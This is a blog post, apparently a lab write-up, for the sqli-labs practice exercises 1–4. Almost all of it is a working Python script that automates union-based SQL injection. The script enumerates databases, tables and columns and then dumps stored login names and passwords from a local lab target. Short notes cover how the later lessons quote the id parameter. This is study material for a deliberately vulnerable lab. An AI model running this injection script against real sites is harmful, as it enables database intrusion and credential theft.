sqli-labs:1-4,基于报错的注入

sqli1:

脚本

  1 # -*- coding: utf-8 -*-
  2 """
  3 Created on Sat Mar 23 09:37:14 2019
  4 
  5 @author: kenshin
  6 """
  7 
  8 import requests,re
  9 url = 'http://localhost/sqli-labs/Less-1/?id=-1'
 10 
 11 def Len_OrderBy(url):
 12     pattern_mark = 'Unknown column'
 13     #假设字段长20
 14     for i in range(1,20):
 15         url_new = url + "\' order by "+ str(i) +"--+"
 16         r = requests.get(url_new)
 17         if(re.findall(pattern_mark,r.text)):
 18             print('the lenght of column(order by) is :' + str(i-1) + "\n")
 19             break
 20     return i-1
 21 
 22 def get_DB(url,lenght):
 23     #注意:由此模式匹配到的是一个数量为1的列表,后续按','将数量拆分成n个,以便输出
 24     pattern_mark = 'Your Login name:(.+?)<br>'
 25     str = ''
 26     for i in range(1,lenght):
 27         str += 'group_concat(schema_name),'
 28     str += 'group_concat(schema_name)'
 29     payload = '\' union select ' + str +' from information_schema.schemata--+'
 30     url += payload
 31     r = requests.get(url)
 32     r = re.findall(pattern_mark,r.text)
 33     #list转str
 34     str_tmp = "".join(r)
 35     #re.split按','拆分
 36     lst = re.split(',',str_tmp)
 37     print('-'*9 + 'databases' + '-'*8)
 38     for s in lst:
 39         print('.' + s )
 40     print('-'*25)
 41 
 42 def get_TB(url,lenght,db):
 43     pattern_mark = 'Your Login name:(.+?)<br>'
 44     str = ''
 45     for i in range(1,lenght):
 46         str += 'group_concat(table_name),'
 47     str += 'group_concat(table_name)'
 48     payload = "\' union select "+ str +" from information_schema.tables where table_schema=\'" + db + "\'--+"
 49     url += payload
 50     r = requests.get(url)
 51     r = re.findall(pattern_mark,r.text)
 52     #list转str
 53     str_tmp = "".join(r)
 54     #re.split按','拆分
 55     lst = re.split(',',str_tmp)
 56     print('-'*9 +'Database '+ db +'\'s Tables' + '-'*8)
 57     for s in lst:
 58         print('.' + s )
 59     print('-'*35)
 60 
 61 def get_Column(url,lenght,tb):
 62     pattern_mark = 'Your Login name:(.+?)<br>'
 63     str = ''
 64     for i in range(1,lenght):
 65         str += 'group_concat(column_name),'
 66     str += 'group_concat(column_name)'
 67     payload = "\' union select " +str+ " from information_schema.columns where table_name=\'" +tb+ "\'--+"
 68     url += payload
 69     r = requests.get(url)
 70     r = re.findall(pattern_mark,r.text)
 71     #list转str
 72     str_tmp = ''.join(r)
 73     #re.split按','拆分
 74     lst = re.split(',',str_tmp)
 75     print('-'*9 +'Table '+ tb +'\'s Columns' + '-'*8)
 76     for s in lst:
 77         print('.' + s )
 78     print('-'*35)
 79   
 80 def get_data(url,lenght,tb,data):
 81     pattern_mark = 'Your Login name:(.+?)<br>'
 82     pattern_mark_pass = 'Your Password:(.+?)</font>'
 83     #if lenght=5 
 84     #data=a,b,c 
 85     #after expend 
 86     #data=a,b,c,4,5
 87     #str to list
 88     lst = data.split(",")
 89     while len(lst) < lenght:
 90         lst.append(str(len(lst)+1))
 91     #list to str
 92     sn = ''
 93     for i in lst:
 94         sn += i+","
 95     #以上循环结果sn='a,b,c,'  c后的‘,’舍去才能构造正确payload
 96     sn=sn.rstrip(",")
 97     #格式化输出结果
 98     print('-'*9 +'Table '+ tb +'\'s All datas' + '-'*8)
 99     #假设最多有100组数据
100     for i in range(1,100):
101         payload = "\' union select "+ sn +" from "+ tb +" where id="+ str(i) +"--+"
102         url_new = url + payload
103         r = r_pass = requests.get(url_new)
104         r = re.findall(pattern_mark,r.text)
105         r_pass = re.findall(pattern_mark_pass,r_pass.text)
106         print(str(r) +" "*(16-len(str(r)))+"=>  "+str(r_pass)+" "*(18-len(str(r_pass)))+"|")
107         if (len(r)==0 and len(r_pass)==0):
108             break
109     print("-"*41)
110 
111 #字段长度        
112 lenght = Len_OrderBy(url)
113 #所有数据库
114 get_DB(url,lenght)
115 #由库爆表
116 db = input("select databases >> ")
117 get_TB(url,lenght,db)
118 #由表爆列
119 tb = input("select table >> ")
120 get_Column(url,3,tb)
121 #由表和列名爆数据
122 data = input("select columns (no more than " +str(lenght)+ ",and separate by ',') >> ")
123 get_data(url,lenght,tb,data)
脚本 1

 

 

sqli2:

与sqli1比较,少了 ',对id没有经过处理。

 

sqli3:

对id经过了')处理

 

 sqli4:

对id经过了")处理

 

posted @ 2019-03-23 15:38  p0pl4r  阅读(448)  评论(0编辑  收藏  举报